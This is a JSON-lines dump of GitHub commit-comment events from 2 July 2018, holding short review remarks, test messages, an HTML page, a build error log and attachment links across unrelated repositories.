{"id":"7904676592","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29561525,"position":null,"line":null,"path":null,"commit_id":"a018b25b77be606159c69b87d57c8a82c448b7bd","created_at":"2018-07-02T06:13:51Z","updated_at":"2018-07-02T06:13:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-118](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-118-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-02T06:13:51Z"}
{"id":"7904679347","type":"CommitCommentEvent","actor":{"login":"algoinfo"},"repo":{"name":"h476564406/question"},"payload":{"comment":{"id":29561527,"position":null,"line":null,"path":null,"commit_id":"e73e3220d21f0c719b4f6fa072627ead46efcd1c","created_at":"2018-07-02T06:14:46Z","updated_at":"2018-07-02T06:14:46Z","author_association":"NONE","body":"看样子是内嵌script会阻塞之前和之后的渲染，script src 之前的dom可以渲染"}},"created_at":"2018-07-02T06:14:46Z"}
{"id":"7904681970","type":"CommitCommentEvent","actor":{"login":"mbartn"},"repo":{"name":"mkarpacka/innowacja"},"payload":{"comment":{"id":29561533,"position":null,"line":null,"path":null,"commit_id":"c1b96509ca91e09c0bf1623911289516d2ab4cb8","created_at":"2018-07-02T06:15:37Z","updated_at":"2018-07-02T06:15:37Z","author_association":"COLLABORATOR","body":"o fajny"}},"created_at":"2018-07-02T06:15:37Z"}
{"id":"7904686989","type":"CommitCommentEvent","actor":{"login":"TanHaoran"},"repo":{"name":"TanHaoran/o2o-ssm"},"payload":{"comment":{"id":29561537,"position":null,"line":null,"path":null,"commit_id":"058ed364d81387113c1ba012c057877b5a080e1b","created_at":"2018-07-02T06:17:22Z","updated_at":"2018-07-02T06:17:22Z","author_association":"OWNER","body":"在服务器的server.xml中添加：\r\n<Context docBase=\"D:/EclipseProject/image/upload\" path=\"/upload\" />"}},"created_at":"2018-07-02T06:17:22Z"}
{"id":"7904689060","type":"CommitCommentEvent","actor":{"login":"Smartqujia"},"repo":{"name":"Smartqujia/qu"},"payload":{"comment":{"id":29561541,"position":6,"line":6,"path":"practice/the_offsetof_macro/stddef.h","commit_id":"ad117b02eed4ba4533cf085516bbe0fa8223d701","created_at":"2018-07-02T06:18:06Z","updated_at":"2018-07-02T06:18:06Z","author_association":"OWNER","body":"as"}},"created_at":"2018-07-02T06:18:06Z"}
{"id":"7904690946","type":"CommitCommentEvent","actor":{"login":"deindedawodu"},"repo":{"name":"deindedawodu/yarn-flex"},"payload":{"comment":{"id":29561570,"position":null,"line":null,"path":null,"commit_id":"6fc8b0c6eb4f783d5f0cf9496cf8e570a1ef4596","created_at":"2018-07-02T06:18:44Z","updated_at":"2018-07-02T06:18:44Z","author_association":"OWNER","body":"this is something"}},"created_at":"2018-07-02T06:18:44Z"}
{"id":"7904696007","type":"CommitCommentEvent","actor":{"login":"aniketnk"},"repo":{"name":"aniketnk/alcoding-data-analysis"},"payload":{"comment":{"id":29561578,"position":null,"line":null,"path":null,"commit_id":"648251e8af8927e37b7b29d056bf2c5f2e51622d","created_at":"2018-07-02T06:20:28Z","updated_at":"2018-07-02T06:20:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SignIn page Front-End](https://trello.com/c/iYsJvZbh/54-signin-page-front-end)"}},"created_at":"2018-07-02T06:20:28Z"}
{"id":"7904696278","type":"CommitCommentEvent","actor":{"login":"amarc78"},"repo":{"name":"TwrpBuilder/android_device_motorola_owens"},"payload":{"comment":{"id":29561579,"position":null,"line":null,"path":null,"commit_id":"bd60ca084505cb580b0c40af83e9362a78704b79","created_at":"2018-07-02T06:20:34Z","updated_at":"2018-07-02T06:20:34Z","author_association":"CONTRIBUTOR","body":"It was line 37 causing that. Didn't mean to add that."}},"created_at":"2018-07-02T06:20:34Z"}
{"id":"7904725729","type":"CommitCommentEvent","actor":{"login":"PhoLine"},"repo":{"name":"PhoLine/SelfbotLine"},"payload":{"comment":{"id":29561625,"position":null,"line":null,"path":null,"commit_id":"b0dc10327ea50fd2685f2db5827c6827e4cf8c40","created_at":"2018-07-02T06:30:20Z","updated_at":"2018-07-02T06:30:20Z","author_association":"OWNER","body":"[LINETCR.zip](https://github.com/PhoLine/SelfbotLine/files/2154003/LINETCR.zip)\r\n"}},"created_at":"2018-07-02T06:30:20Z"}
{"id":"7904726219","type":"CommitCommentEvent","actor":{"login":"venkat0007"},"repo":{"name":"venkat0007/Hellowworld"},"payload":{"comment":{"id":29561626,"position":null,"line":null,"path":null,"commit_id":"eafd9cf4c0e0b0f74d995220152b06c8fc3b7651","created_at":"2018-07-02T06:30:29Z","updated_at":"2018-07-02T06:30:29Z","author_association":"OWNER","body":"this is first line"}},"created_at":"2018-07-02T06:30:29Z"}
{"id":"7904726873","type":"CommitCommentEvent","actor":{"login":"tombeecreator"},"repo":{"name":"GWT5091/RyouikiPracticalA"},"payload":{"comment":{"id":29561628,"position":33,"line":33,"path":"Clustering.java","commit_id":"766113eb495db22673b71c461377aad774510dad","created_at":"2018-07-02T06:30:40Z","updated_at":"2018-07-02T06:30:40Z","author_association":"NONE","body":"should commit without comments to Github"}},"created_at":"2018-07-02T06:30:40Z"}
{"id":"7904735567","type":"CommitCommentEvent","actor":{"login":"alenalyskova"},"repo":{"name":"alenalyskova/exp2"},"payload":{"comment":{"id":29561633,"position":null,"line":null,"path":null,"commit_id":"6696777f4505f5fbd6b79e0274296a38a963577a","created_at":"2018-07-02T06:33:25Z","updated_at":"2018-07-02T06:33:25Z","author_association":"OWNER","body":"<html>\r\n<head>\r\n<link href=\"style.css\" rel=\"stylesheet\" type=\"text/css\">\r\n<style>\r\n@font-face {\r\n    font-family: HelveticaNeueMed;\r\n    src: url(HelveticaNeueMed.ttf);\r\n}\r\n@font-face {\r\n    font-family: HelveticaNeueBd;\r\n    src: url(HelveticaNeueBd.ttf);\r\n}\r\n\r\n.name {\r\n  text-align: left;\r\n  display: flex;\r\n  flex-direction: row;\r\n  flex-wrap: nowrap;\r\n  align-items: flex-start;\r\n  justify-content: flex-start;\r\n  margin:auto;\r\n  margin-top: 100px;\r\n  padding-bottom: 30px;\r\n}\r\n.menu {\r\n\r\n  display: flex;\r\n  margin: auto;\r\n  flex-direction: row;\r\n  flex-wrap: nowrap;\r\n  align-items: center;\r\n  justify-content: space-between;\r\n  margin-top: 100px;\r\n    -webkit-transition: all 0.5s ease;\r\n       -moz-transition: all 0.5s ease;\r\n         -o-transition: all 0.5s ease;\r\n        -ms-transition: all 0.5s ease;\r\n            transition: all 0.5s ease;\r\n}\r\n.ph {\r\n  width: 100%;\r\n  max-width: 700px;\r\n  padding-bottom: 20px;\r\n  padding: 0.6px;\r\n  align-items: center;\r\n}\r\n\r\n.ph:hover {\r\n      -webkit-transform: rotate(-15deg);\r\n         -moz-transform: rotate(-15deg);\r\n           -o-transform: rotate(-15deg);\r\n          -ms-transform: rotate(-15deg);\r\n              transform: rotate(-15deg);}\r\n\r\n</style>\r\n</head>\r\n\r\n<body>\r\n<main>\r\n  <div class=\"name\"> TOUCH TO<br>EXPLORE</div>\r\n\r\n  <div class=\"menu\">\r\n  <div class=\"ph\"><a href=\"about.html\"><img src=\"romb-01.png\"width=220px></a></div>\r\n  <div class=\"ph\"><a href=\"portfolio.html\"><img src=\"romb-02-01.png\"width=220px></a></div>\r\n  <div class=\"ph\"><a href=\"contatti.html\"><img src=\"romb-03-01.png\"width=220px></a></div>\r\n  </div>\r\n</main>\r\n</body>\r\n</html>\r\n"}},"created_at":"2018-07-02T06:33:25Z"}
{"id":"7904735780","type":"CommitCommentEvent","actor":{"login":"carlos-briso"},"repo":{"name":"carlos-briso/prueba"},"payload":{"comment":{"id":29561634,"position":4,"line":4,"path":"README.md","commit_id":"ca416fe06fdc89a27e58186fbf54ab21ac784247","created_at":"2018-07-02T06:33:29Z","updated_at":"2018-07-02T06:33:29Z","author_association":"OWNER","body":"prueba 4"}},"created_at":"2018-07-02T06:33:29Z"}
{"id":"7904738197","type":"CommitCommentEvent","actor":{"login":"carlos-briso"},"repo":{"name":"carlos-briso/prueba"},"payload":{"comment":{"id":29561636,"position":null,"line":null,"path":null,"commit_id":"ca416fe06fdc89a27e58186fbf54ab21ac784247","created_at":"2018-07-02T06:34:13Z","updated_at":"2018-07-02T06:34:13Z","author_association":"OWNER","body":"ddddd"}},"created_at":"2018-07-02T06:34:13Z"}
{"id":"7904742153","type":"CommitCommentEvent","actor":{"login":"KvanTTT"},"repo":{"name":"antlr/grammars-v4"},"payload":{"comment":{"id":29561649,"position":15,"line":14,"path":".gitattributes","commit_id":"f08f5d22947ff8dc7231aa0dbce60a72debee665","created_at":"2018-07-02T06:35:27Z","updated_at":"2018-07-02T06:35:27Z","author_association":"MEMBER","body":"?"}},"created_at":"2018-07-02T06:35:27Z"}
{"id":"7904744885","type":"CommitCommentEvent","actor":{"login":"Lmoher"},"repo":{"name":"Lmoher/first-try"},"payload":{"comment":{"id":29561668,"position":null,"line":null,"path":null,"commit_id":"3a817a3a9962ef395010b2cd79a9f99b2aca23a1","created_at":"2018-07-02T06:36:17Z","updated_at":"2018-07-02T06:36:17Z","author_association":"OWNER","body":"88888"}},"created_at":"2018-07-02T06:36:17Z"}
{"id":"7904746388","type":"CommitCommentEvent","actor":{"login":"QIUchunyong"},"repo":{"name":"QIUchunyong/learngit"},"payload":{"comment":{"id":29561673,"position":null,"line":null,"path":null,"commit_id":"36d1ec61adcece5bf275c7f28ec7297a268a985c","created_at":"2018-07-02T06:36:46Z","updated_at":"2018-07-02T06:36:46Z","author_association":"OWNER","body":"写的太好啦。666"}},"created_at":"2018-07-02T06:36:46Z"}
{"id":"7904750305","type":"CommitCommentEvent","actor":{"login":"jinyangxue"},"repo":{"name":"jinyangxue/work"},"payload":{"comment":{"id":29561682,"position":null,"line":null,"path":null,"commit_id":"cfb4cec3bb06b001eeb42209159809b68bd4e460","created_at":"2018-07-02T06:37:59Z","updated_at":"2018-07-02T06:37:59Z","author_association":"OWNER","body":"[work4'.docx](https://github.com/jinyangxue/work/files/2154025/work4.docx)\r\n"}},"created_at":"2018-07-02T06:37:59Z"}
{"id":"7904750657","type":"CommitCommentEvent","actor":{"login":"Etaglibash"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29561684,"position":null,"line":null,"path":null,"commit_id":"8d5afd8f2f18a444ee3bc375b56745eb54a2b453","created_at":"2018-07-02T06:38:06Z","updated_at":"2018-07-02T06:38:06Z","author_association":"CONTRIBUTOR","body":"Cambié la vieja lista de nombres por la lista que aparece aquí\r\nhttps://en.wikipedia.org/wiki/Planets_in_science_fiction\r\nY agregué más planetas de startrek y otros scifi famosos y nombres de dioses aztecas, incas y mayas.\r\n\r\nOutlandertown.txt es un cambio de nombre."}},"created_at":"2018-07-02T06:38:06Z"}
{"id":"7904753724","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29561692,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-02T06:39:03Z","updated_at":"2018-07-02T06:39:03Z","author_association":"OWNER","body":"> OpenGL does not allow 'smooth' with 'varying'\r\n\r\nThat shouldn't happen: \r\n\r\n- if GLES is defined then smooth/flat is not used (because not supported). And vary is defined as `varying`. \r\n\r\n- if GLES is not defined (Open GL 3+) then `varying` is not used and in/out are used instead."}},"created_at":"2018-07-02T06:39:03Z"}
{"id":"7904754045","type":"CommitCommentEvent","actor":{"login":"nikitadey"},"repo":{"name":"nikitadey/GridlayoutDivider"},"payload":{"comment":{"id":29561693,"position":null,"line":null,"path":null,"commit_id":"29d4f2569d8832557049a5d876f484ca87ca7416","created_at":"2018-07-02T06:39:09Z","updated_at":"2018-07-02T06:39:09Z","author_association":"OWNER","body":"![grid](https://user-images.githubusercontent.com/6201889/42148646-cd9d9f40-7df2-11e8-8dd1-72da20a50fb3.png)\r\n"}},"created_at":"2018-07-02T06:39:09Z"}
{"id":"7904754209","type":"CommitCommentEvent","actor":{"login":"carlos-briso"},"repo":{"name":"carlos-briso/prueba"},"payload":{"comment":{"id":29561694,"position":4,"line":5,"path":"README.md","commit_id":"18c955f5387cb447481c0d13f9fcdd50332b7739","created_at":"2018-07-02T06:39:12Z","updated_at":"2018-07-02T06:39:12Z","author_association":"OWNER","body":"prueba 5"}},"created_at":"2018-07-02T06:39:12Z"}
{"id":"7904755876","type":"CommitCommentEvent","actor":{"login":"okkahfai93"},"repo":{"name":"yelled3/react-native-google-static-map"},"payload":{"comment":{"id":29561695,"position":5,"line":167,"path":"GoogleStaticMap.js","commit_id":"8caf3addd31ba2f0ac2ade4e95f1d2ba66c36631","created_at":"2018-07-02T06:39:40Z","updated_at":"2018-07-02T06:39:40Z","author_association":"NONE","body":"The google cloud is not able to track this api, Ived checked the documentation, it is still using `key` as the ApiKey keyword"}},"created_at":"2018-07-02T06:39:40Z"}
{"id":"7904760262","type":"CommitCommentEvent","actor":{"login":"zyh1069589164"},"repo":{"name":"zyh1069589164/2018-03-06"},"payload":{"comment":{"id":29561703,"position":null,"line":null,"path":null,"commit_id":"fcb11a08b5f4a286e85c1b37da557608f1a10357","created_at":"2018-07-02T06:40:52Z","updated_at":"2018-07-02T06:40:52Z","author_association":"OWNER","body":"小组文档"}},"created_at":"2018-07-02T06:40:52Z"}
{"id":"7904764156","type":"CommitCommentEvent","actor":{"login":"nikitadey"},"repo":{"name":"nikitadey/GridlayoutDivider"},"payload":{"comment":{"id":29561708,"position":null,"line":null,"path":null,"commit_id":"29d4f2569d8832557049a5d876f484ca87ca7416","created_at":"2018-07-02T06:42:03Z","updated_at":"2018-07-02T06:42:03Z","author_association":"OWNER","body":"![grid2](https://user-images.githubusercontent.com/6201889/42148771-364458d6-7df3-11e8-97bd-0da21466ac76.png)\r\n"}},"created_at":"2018-07-02T06:42:03Z"}
{"id":"7904764731","type":"CommitCommentEvent","actor":{"login":"notsu"},"repo":{"name":"Elecweb/modern-js-cheatsheet"},"payload":{"comment":{"id":29561709,"position":null,"line":null,"path":null,"commit_id":"ff74545902c7bb2d02a1782082552ca3f3a9f6a6","created_at":"2018-07-02T06:42:13Z","updated_at":"2018-07-02T06:42:13Z","author_association":"NONE","body":"@Elecweb ยินดีมากเลยครับ อ่านง่ายและลื่นขึ้นมากครับ 😄 "}},"created_at":"2018-07-02T06:42:13Z"}
{"id":"7904774563","type":"CommitCommentEvent","actor":{"login":"shuaimaMonica"},"repo":{"name":"shuaimaMonica/-Javascript-react-EC6"},"payload":{"comment":{"id":29561723,"position":null,"line":null,"path":null,"commit_id":"d9e8a12f32e354064b37b7d06b30d859dc5b1b86","created_at":"2018-07-02T06:45:14Z","updated_at":"2018-07-02T06:45:14Z","author_association":"OWNER","body":"merge"}},"created_at":"2018-07-02T06:45:14Z"}
{"id":"7904778946","type":"CommitCommentEvent","actor":{"login":"Micoael"},"repo":{"name":"MinecraftChina/MinecraftForge"},"payload":{"comment":{"id":29561732,"position":null,"line":null,"path":null,"commit_id":"5bc5f734417162f02713a32b20c1929309867fbc","created_at":"2018-07-02T06:46:32Z","updated_at":"2018-07-02T06:46:32Z","author_association":"NONE","body":"Useless and SUCK china Netease"}},"created_at":"2018-07-02T06:46:32Z"}
{"id":"7904779120","type":"CommitCommentEvent","actor":{"login":"gpaapps"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":29561733,"position":null,"line":null,"path":null,"commit_id":"07060eaecc07c444470b91b0915b63b6f4fc88f7","created_at":"2018-07-02T06:46:35Z","updated_at":"2018-07-02T06:46:35Z","author_association":"NONE","body":"I am still a bit confused on how to set up celery. I still need to provide a Celery_Broker_Url env variable for celery to work. It wont just work out of the box for async tasks?"}},"created_at":"2018-07-02T06:46:35Z"}
{"id":"7904787788","type":"CommitCommentEvent","actor":{"login":"jamesnetherton"},"repo":{"name":"ppalaga/wildfly-camel"},"payload":{"comment":{"id":29561748,"position":5,"line":82,"path":"catalog/src/main/resources/component.roadmap","commit_id":"81f289e9d99166c50d48b2992ba5e403836b178d","created_at":"2018-07-02T06:49:07Z","updated_at":"2018-07-02T06:49:07Z","author_association":"NONE","body":"Same issue that we had on the 2.21.x branch. This comment is not present on the master branch anymore, so it should be removed."}},"created_at":"2018-07-02T06:49:07Z"}
{"id":"7904793616","type":"CommitCommentEvent","actor":{"login":"dstogov"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29561753,"position":null,"line":null,"path":null,"commit_id":"6e77a60a75445c863f85f81a83e5c2dd28f0e877","created_at":"2018-07-02T06:50:48Z","updated_at":"2018-07-02T06:50:48Z","author_association":"CONTRIBUTOR","body":"@nikic I saw, you already fixed my bug. Thanks."}},"created_at":"2018-07-02T06:50:48Z"}
{"id":"7904795772","type":"CommitCommentEvent","actor":{"login":"nikitadey"},"repo":{"name":"nikitadey/GridlayoutDivider"},"payload":{"comment":{"id":29561754,"position":null,"line":null,"path":null,"commit_id":"29d4f2569d8832557049a5d876f484ca87ca7416","created_at":"2018-07-02T06:51:25Z","updated_at":"2018-07-02T06:51:25Z","author_association":"OWNER","body":"![grid3](https://user-images.githubusercontent.com/6201889/42149090-80d76dce-7df4-11e8-858e-4643a6fae633.png)\r\n"}},"created_at":"2018-07-02T06:51:25Z"}
{"id":"7904800597","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29561760,"position":null,"line":null,"path":null,"commit_id":"b7dc60f7b4e972610846a506b7405f3631bec364","created_at":"2018-07-02T06:52:39Z","updated_at":"2018-07-02T06:52:39Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/b7dc60f7b4e972610846a506b7405f3631bec364#commitcomment-29560902) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/2f9ae8e203218e496e24c6ee22f6734f28ab38b0/daily_2018_7_2/report.md). cc @ararslan"}},"created_at":"2018-07-02T06:52:39Z"}
{"id":"7904803946","type":"CommitCommentEvent","actor":{"login":"dev-sl"},"repo":{"name":"liip/LiipMonitorBundle"},"payload":{"comment":{"id":29561764,"position":1,"line":1,"path":"Check/MemcachedCollection.php","commit_id":"40821e368cf5b15a758d496de607775b491501d5","created_at":"2018-07-02T06:53:38Z","updated_at":"2018-07-02T06:53:38Z","author_association":"CONTRIBUTOR","body":"Tag it plese"}},"created_at":"2018-07-02T06:53:38Z"}
{"id":"7904809697","type":"CommitCommentEvent","actor":{"login":"nameisstevenwang"},"repo":{"name":"nameisstevenwang/Financial-Data-Analysis"},"payload":{"comment":{"id":29561770,"position":null,"line":null,"path":null,"commit_id":"abd0413a2cce2d2150dc5cd0e9f22894366a7d5e","created_at":"2018-07-02T06:55:15Z","updated_at":"2018-07-02T06:55:15Z","author_association":"OWNER","body":"data use to run the code\r\n"}},"created_at":"2018-07-02T06:55:15Z"}
{"id":"7904810554","type":"CommitCommentEvent","actor":{"login":"LiuduZero"},"repo":{"name":"LiuduZero/POS"},"payload":{"comment":{"id":29561771,"position":null,"line":null,"path":null,"commit_id":"b2d03769b91207a323b414304563daa1e7fa070a","created_at":"2018-07-02T06:55:30Z","updated_at":"2018-07-02T06:55:30Z","author_association":"OWNER","body":"no write here"}},"created_at":"2018-07-02T06:55:30Z"}
{"id":"7904811228","type":"CommitCommentEvent","actor":{"login":"viliam-durina"},"repo":{"name":"hazelcast/hazelcast-jet"},"payload":{"comment":{"id":29561772,"position":26,"line":911,"path":"hazelcast-jet-core/src/main/java/com/hazelcast/jet/pipeline/Sources.java","commit_id":"f8fdd4bb3d04b4ffc054d0f2c89c2196511e6c53","created_at":"2018-07-02T06:55:40Z","updated_at":"2018-07-02T06:55:40Z","author_association":"CONTRIBUTOR","body":"This try-catch should be removed"}},"created_at":"2018-07-02T06:55:40Z"}
{"id":"7904816122","type":"CommitCommentEvent","actor":{"login":"smartavionics"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":29561776,"position":null,"line":null,"path":null,"commit_id":"b56d33b9f32e5e819a2104a84a89820345613e91","created_at":"2018-07-02T06:56:59Z","updated_at":"2018-07-02T06:56:59Z","author_association":"CONTRIBUTOR","body":"I do hope that you are going to provide some explanation as to why these changes have been done otherwise you are just making CuraEngine code even harder to understand. Please either add comments to the code or provide a better explanation in the commit messages. Thanks."}},"created_at":"2018-07-02T06:56:59Z"}
{"id":"7904818653","type":"CommitCommentEvent","actor":{"login":"jwise"},"repo":{"name":"moroso/cpu"},"payload":{"comment":{"id":29561781,"position":7,"line":7,"path":"rtl/mc/MCPU_MEM_pt_walk.v","commit_id":"1feb3d8de0335b5cc17db48bf391ae4c02f535ed","created_at":"2018-07-02T06:57:40Z","updated_at":"2018-07-02T06:57:40Z","author_association":"CONTRIBUTOR","body":"Pin names like `addr` are hard to connect together with verilog-mode.  How about `tlb2ptw_addr`?"}},"created_at":"2018-07-02T06:57:40Z"}
{"id":"7904823781","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"TheMagician1/redmine_backlogs"},"payload":{"comment":{"id":29561789,"position":null,"line":null,"path":null,"commit_id":"75b8c77a95e671e0efbb6deb89fc500167057652","created_at":"2018-07-02T06:59:04Z","updated_at":"2018-07-02T06:59:04Z","author_association":"NONE","body":"the log file:\r\n\"gcc -o conftest -I/apps/redmine/ruby/include/ruby-2.3.0/x86_64-linux -I/apps/redmine/ruby/include/ruby-2.3.0/ruby/backward -I/apps/redmine/ruby/include/ruby-2.3.0 -I. -DAI_ADDRCONFIG=0 -I/apps/redmine/sqlite/include -I/apps/redmine/common/include  -I/apps/redmine/common/include/sasl -I/apps/redmine/common/include   -fPIC -I/apps/redmine/common/include -fPIC -I/apps/redmine/common/include -I/apps/redmine/common/include -fPIC -I/apps/redmine/common/include/ImageMagick-6 -I/apps/redmine/common/include/ImageMagick-6/wand/ -I/apps/redmine/common/include/ImageMagick-6/MagickCore/ -I/apps/redmine/common/include/ImageMagick-6 -I/apps/redmine/common/include/ImageMagick-6/wand/ -I/apps/redmine/common/include/ImageMagick-6/MagickCore/ conftest.c  -L. -L/apps/redmine/ruby/lib -Wl,-rpath,/apps/redmine/ruby/lib -L. -L/apps/redmine/common/lib -L/apps/redmine/common/lib -L/apps/redmine/sqlite/lib -L/apps/redmine/common/lib -L/apps/redmine/common/lib -L/apps/redmine/common/lib -fstack-protector -rdynamic -Wl,-export-dynamic  -m64   -Wl,-rpath,/apps/redmine/ruby/lib -L/apps/redmine/ruby/lib -lruby-static  -lpthread -lgmp -ldl -lcrypt -lm   -lc\"\r\nIn file included from /apps/redmine/ruby/include/ruby-2.3.0/ruby.h:33,\r\n                 from conftest.c:1:\r\n/apps/redmine/ruby/include/ruby-2.3.0/ruby/ruby.h:1422: error: wrong number of arguments specified for ‘deprecated’ attribute\r\n/apps/redmine/ruby/include/ruby-2.3.0/ruby/ruby.h:1431: error: wrong number of arguments specified for ‘deprecated’ attribute\r\nchecked program was:\r\n/* begin */\r\n1: #include \"ruby.h\"\r\n2:\r\n3: int main(int argc, char **argv)\r\n4: {\r\n5:   return 0;\r\n6: }\r\n/* end */\r\n\r\n\"pkg-config --exists openssl\"\r\n| pkg-config --libs openssl\r\n=> \"-L/apps/redmine/common/lib -lssl -lcrypto \\n\"\r\n"}},"created_at":"2018-07-02T06:59:04Z"}
{"id":"7904824747","type":"CommitCommentEvent","actor":{"login":"gaochengyidlmu"},"repo":{"name":"gaochengyidlmu/parameter"},"payload":{"comment":{"id":29561794,"position":null,"line":null,"path":null,"commit_id":"5e8cdf46350abc8ae6de50d8f1b4a464d7856c60","created_at":"2018-07-02T06:59:20Z","updated_at":"2018-07-02T06:59:20Z","author_association":"OWNER","body":"value is null shouldn't validate"}},"created_at":"2018-07-02T06:59:20Z"}
{"id":"7904828749","type":"CommitCommentEvent","actor":{"login":"zhangfei1992"},"repo":{"name":"zhangfei1992/test"},"payload":{"comment":{"id":29561807,"position":1,"line":1,"path":"java1.java","commit_id":"72f8c5f5a774837aea947f294abc467a2f54d64c","created_at":"2018-07-02T07:00:22Z","updated_at":"2018-07-02T07:00:22Z","author_association":"OWNER","body":"编辑，删除aaaa"}},"created_at":"2018-07-02T07:00:22Z"}
{"id":"7904829889","type":"CommitCommentEvent","actor":{"login":"zhangfei1992"},"repo":{"name":"zhangfei1992/test"},"payload":{"comment":{"id":29561810,"position":null,"line":null,"path":null,"commit_id":"72f8c5f5a774837aea947f294abc467a2f54d64c","created_at":"2018-07-02T07:00:38Z","updated_at":"2018-07-02T07:00:38Z","author_association":"OWNER","body":"添加字段bbbb"}},"created_at":"2018-07-02T07:00:38Z"}
{"id":"7904834225","type":"CommitCommentEvent","actor":{"login":"navv1234"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29561826,"position":18,"line":300,"path":"engine/action/sc_dot.cpp","commit_id":"8f763748dcef205e7d609915dba1b25d1a5792f0","created_at":"2018-07-02T07:01:34Z","updated_at":"2018-07-02T07:01:34Z","author_association":"CONTRIBUTOR","body":"The debug output here should probably be a bit less confusing."}},"created_at":"2018-07-02T07:01:34Z"}
{"id":"7904837186","type":"CommitCommentEvent","actor":{"login":"zhangfei1992"},"repo":{"name":"zhangfei1992/test"},"payload":{"comment":{"id":29561831,"position":3,"line":2,"path":"java1.java","commit_id":"72f8c5f5a774837aea947f294abc467a2f54d64c","created_at":"2018-07-02T07:02:17Z","updated_at":"2018-07-02T07:02:17Z","author_association":"OWNER","body":"添加字段bbbb"}},"created_at":"2018-07-02T07:02:17Z"}
{"id":"7904845908","type":"CommitCommentEvent","actor":{"login":"jinyangxue"},"repo":{"name":"jinyangxue/work"},"payload":{"comment":{"id":29561845,"position":null,"line":null,"path":null,"commit_id":"f8814fc419ac35bb3e6091475cabe7b93fa686d9","created_at":"2018-07-02T07:04:50Z","updated_at":"2018-07-02T07:04:50Z","author_association":"OWNER","body":"[work1'.docx](https://github.com/jinyangxue/work/files/2154115/work1.docx)\r\n"}},"created_at":"2018-07-02T07:04:50Z"}
{"id":"7904851254","type":"CommitCommentEvent","actor":{"login":"gqadirbarejo"},"repo":{"name":"gqadirbarejo/helloworld"},"payload":{"comment":{"id":29561862,"position":5,"line":75,"path":"index.html","commit_id":"b19d58b49cbbb649d3dc79ffe7a7823017f962be","created_at":"2018-07-02T07:06:20Z","updated_at":"2018-07-02T07:06:20Z","author_association":"OWNER","body":"Remove this anchor"}},"created_at":"2018-07-02T07:06:20Z"}
{"id":"7904851889","type":"CommitCommentEvent","actor":{"login":"Yogesh-Yaduvanshi"},"repo":{"name":"Yogesh-Yaduvanshi/Hello-world"},"payload":{"comment":{"id":29561863,"position":null,"line":null,"path":null,"commit_id":"5e7942a1cbdab1d83ed4168a00833da10b564010","created_at":"2018-07-02T07:06:32Z","updated_at":"2018-07-02T07:06:32Z","author_association":"OWNER","body":"gfhgf"}},"created_at":"2018-07-02T07:06:32Z"}
{"id":"7904858310","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"nruth/show_me_the_cookies"},"payload":{"comment":{"id":29561876,"position":null,"line":null,"path":null,"commit_id":"67bbc74a218ecf752509cdef487645f61e936090","created_at":"2018-07-02T07:08:18Z","updated_at":"2018-07-02T07:08:18Z","author_association":"NONE","body":"Love it! :)"}},"created_at":"2018-07-02T07:08:18Z"}
{"id":"7904862341","type":"CommitCommentEvent","actor":{"login":"lazfasia"},"repo":{"name":"jeaimetu/dwitter"},"payload":{"comment":{"id":29561891,"position":null,"line":null,"path":null,"commit_id":"f9480b43c82a4df8d086a668f9dd52aaf6bc0efb","created_at":"2018-07-02T07:09:24Z","updated_at":"2018-07-02T07:09:24Z","author_association":"COLLABORATOR","body":"글 잘림 수정"}},"created_at":"2018-07-02T07:09:24Z"}
{"id":"7904863193","type":"CommitCommentEvent","actor":{"login":"PriyankaNagale"},"repo":{"name":"PriyankaNagale/hello-world"},"payload":{"comment":{"id":29561895,"position":null,"line":null,"path":null,"commit_id":"904304c940c7e20988bc4107116218ec74ca99c1","created_at":"2018-07-02T07:09:39Z","updated_at":"2018-07-02T07:09:39Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-02T07:09:39Z"}
{"id":"7904863826","type":"CommitCommentEvent","actor":{"login":"crq131290"},"repo":{"name":"crq131290/jsTask"},"payload":{"comment":{"id":29561896,"position":null,"line":null,"path":null,"commit_id":"f1435837b38010172e07e79b263bc6d3a56a6899","created_at":"2018-07-02T07:09:49Z","updated_at":"2018-07-02T07:09:49Z","author_association":"OWNER","body":"121"}},"created_at":"2018-07-02T07:09:49Z"}
{"id":"7904864279","type":"CommitCommentEvent","actor":{"login":"crq131290"},"repo":{"name":"crq131290/jsTask"},"payload":{"comment":{"id":29561897,"position":null,"line":null,"path":null,"commit_id":"f1435837b38010172e07e79b263bc6d3a56a6899","created_at":"2018-07-02T07:09:57Z","updated_at":"2018-07-02T07:09:57Z","author_association":"OWNER","body":"12"}},"created_at":"2018-07-02T07:09:57Z"}
{"id":"7904867352","type":"CommitCommentEvent","actor":{"login":"crq131290"},"repo":{"name":"crq131290/jsTask"},"payload":{"comment":{"id":29561905,"position":null,"line":null,"path":null,"commit_id":"a4cc2715352e3978e88aad1b8839faf8746a0dca","created_at":"2018-07-02T07:10:46Z","updated_at":"2018-07-02T07:10:46Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-02T07:10:46Z"}
